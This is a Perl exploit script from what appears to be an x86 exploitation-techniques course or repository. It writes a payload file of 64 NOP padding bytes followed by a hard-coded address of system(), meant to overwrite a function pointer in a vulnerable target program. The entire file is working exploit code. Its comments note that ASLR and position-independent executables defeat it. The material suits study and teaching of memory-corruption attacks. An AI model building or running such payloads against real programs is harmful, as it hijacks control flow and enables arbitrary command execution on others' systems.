advanced-exploitation-techniques-x86 / funcptr / funcptr_exploit.pl
#!/usr/bin/perl

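use strict;
use warnings;

# Builds the input file for the function-pointer overwrite demo: 64 filler
# bytes followed by a 4-byte address, written to ./payload_funcptr.

# This address must match the address of system in the target program.
# The bytes are the 32-bit value 0x08048340 in little-endian order.
# NOTE(review): the value is hard-coded, so the payload is only meaningful
# when the target's memory layout is identical from run to run. Building the
# target as a position-independent executable with ASLR enabled is the
# standard mitigation that breaks this assumption.
my $sysaddr = "\x40\x83\x04\x08";  # 0x08048340

# 64 filler bytes. 0x90 is the x86 NOP opcode, but the byte value is
# presumably irrelevant here: the bytes appear to serve only as padding in
# front of the address -- confirm against the target program's source, which
# is not part of this file.
my $pad = "\x90" x 64;

# Input string for the victim program: padding first, address last.
my $arg = $pad . $sysaddr;

# Store the input string in a file.
# Three-argument open with a lexical handle avoids the mode-parsing pitfalls
# of the two-argument form; the :raw layer keeps the bytes from being altered
# by newline or encoding translation. Every I/O call is checked so that a
# missing or truncated payload file is reported rather than silently used.
my $payload_file = 'payload_funcptr';

open(my $out, '>:raw', $payload_file)
    or die "Cannot open $payload_file for writing: $!";
print {$out} $arg
    or die "Cannot write to $payload_file: $!";
close($out)
    or die "Cannot close $payload_file: $!";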